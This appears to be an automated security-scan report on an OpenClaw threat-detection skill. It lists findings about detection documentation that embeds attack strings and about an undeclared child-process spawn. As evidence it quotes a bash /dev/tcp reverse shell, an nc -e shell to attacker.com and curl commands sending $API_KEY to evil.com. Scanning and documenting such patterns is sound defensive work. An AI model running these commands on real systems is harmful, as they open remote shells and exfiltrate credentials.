High risk (risk score 75/100)
Last scanned: 1 day ago
clawguard-threat-detect
ClawGuard Threat Detector - Real-time behavioral monitoring and threat detection for OpenClaw
Security tool that documents actual attack payloads (reverse shells, credential exfiltration) as detection examples, creating a doc-to-code mismatch where the documentation itself serves as an attack template library.
Skill name: clawguard-threat-detect
Analysis time: 55.5s
Engine: pi
Do not install this skill
Do not use. The SKILL.md contains hardcoded malicious patterns presented as 'examples to block' that could serve as attack templates. Remove all actual payload examples and replace with generic descriptions only.

Attack chain: 4 steps

1. [Privilege escalation] Skill presents as legitimate threat detector (SKILL.md:1)
2. [Privilege escalation] User reads SKILL.md and learns attack patterns (SKILL.md:34)
3. [Privilege escalation] User copies documented payloads as templates (SKILL.md:34)
4. [Privilege escalation] cli.js spawns child process with unvalidated input (cli.js:42)

Security findings: 5

Severity | Finding | Location
Critical: Hardcoded Reverse Shell Payloads in Documentation [Documentation deception]
SKILL.md:34 contains actual reverse shell commands (nc -e, /dev/tcp/, bash -i >&) presented as 'examples of what to detect'. These are functional attack templates, not generic descriptions.
Evidence: bash -i >& /dev/tcp/10.0.0.1/4444 0>&1, nc -e /bin/bash attacker.com
→ Remove all actual payload examples. Replace with generic pattern descriptions like 'reverse shell using file descriptor redirection' without concrete commands.
Location: SKILL.md:34

Critical: Credential Exfiltration URLs Documented [Documentation deception]
SKILL.md and cli.js contain examples of credential exfiltration using curl with API tokens sent to evil.com. These are functional attack templates.
Evidence: curl http://evil.com/exfil?token=$API_KEY
→ Remove all C2 infrastructure examples. Describe attack patterns generically.
Location: SKILL.md:83

High: Full Reverse Shell Example in CLI [Documentation deception]
cli.js:101 includes a complete reverse shell payload as a CLI example, normalizing dangerous attack techniques.
Evidence: bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
→ Remove all concrete attack payloads from CLI examples.
Location: cli.js:101

High: Undeclared Child Process Spawn with Unvalidated Input [Code execution]
cli.js:42-50 uses spawn() to invoke a 'self-improving-safety' module with piped stdin containing unvalidated alert data. This is not declared in SKILL.md.
Evidence: spawn(process.execPath, [safetyCliPath, 'learn'], { stdio: ['pipe', 'inherit', 'inherit'] })
→ Declare shell:WRITE capability or refactor to avoid child process execution. Validate and sanitize all data before piping to child processes.
Location: cli.js:42

High: Comprehensive Attack Template Library [Documentation deception]
SKILL.md contains a full MITRE ATT&CK coverage matrix with concrete examples of T1059 (Command/Script), T1041 (Exfiltration), T1059.004 (Bash Reverse Shell), providing a complete attack playbook.
Evidence: Full detection patterns with actual payload examples
→ Simplify documentation to describe detection capabilities without embedding actual exploit code.
Location: SKILL.md:34

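Resource type | Declared permission | Inferred permission | Status | Evidence
File system | NONE | READ | ✓ Consistent | src/detector.js:8 - uses fs module for file monitoring
Command execution | NONE | WRITE | ✗ Exceeds declared permission | cli.js:42-50 - spawns child process with piped stdin
Network access | NONE | READ | ✓ Consistent | src/detector.js - analyzes network patterns for URLs
Environment variables | NONE | READ | ✓ Consistent | cli.js:101 - references $API_KEY from environment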
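3 critical, 7 findings

Severity | Category | Rule | Match | Location
Critical | Dangerous command | Dangerous shell command | nc -e | SKILL.md:34
Critical | Dangerous command | Dangerous shell command | /dev/tcp/ | SKILL.md:34
Critical | Dangerous command | Dangerous shell command | bash -i >& | cli.js:101
Medium | External URL | External URL | http://evil.com/exfil | SKILL.md:83
Medium | External URL | External URL | http://evil.com | SKILL.md:462
Medium | External URL | External URL | http://evil.com/exfil?token=$API_KEY | SKILL.md:601
Medium | External URL | External URL | http://evil.com?token=$API_KEY | cli.js:67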

Directory structure

6 files · 44.5 KB · 1508 lines
Markdown: 2 files, 881 lines · JavaScript: 2 files, 606 lines · JSON: 2 files, 21 lines
├─ 📁 src
│ └─ 📜 detector.js JavaScript 503L · 14.3 KB
├─ 📋 _meta.json JSON 7L · 159 B
├─ 📜 cli.js JavaScript 103L · 3.2 KB
├─ 📋 package.json JSON 14L · 398 B
├─ 📝 README.md Markdown 138L · 4.1 KB
└─ 📝 SKILL.md Markdown 743L · 22.4 KB

Dependency analysis: 1 item

Package name | Version | Source | Known vulnerabilities | Notes
none | N/A | npm | | No external dependencies in package.json

Security highlights

✓ No actual credential harvesting code (patterns are in documentation, not executed)
✓ No direct C2 communication in actual code (only documented examples)
✓ No supply chain risks (package.json has no external dependencies)
✓ Threat detection logic is legitimate pattern matching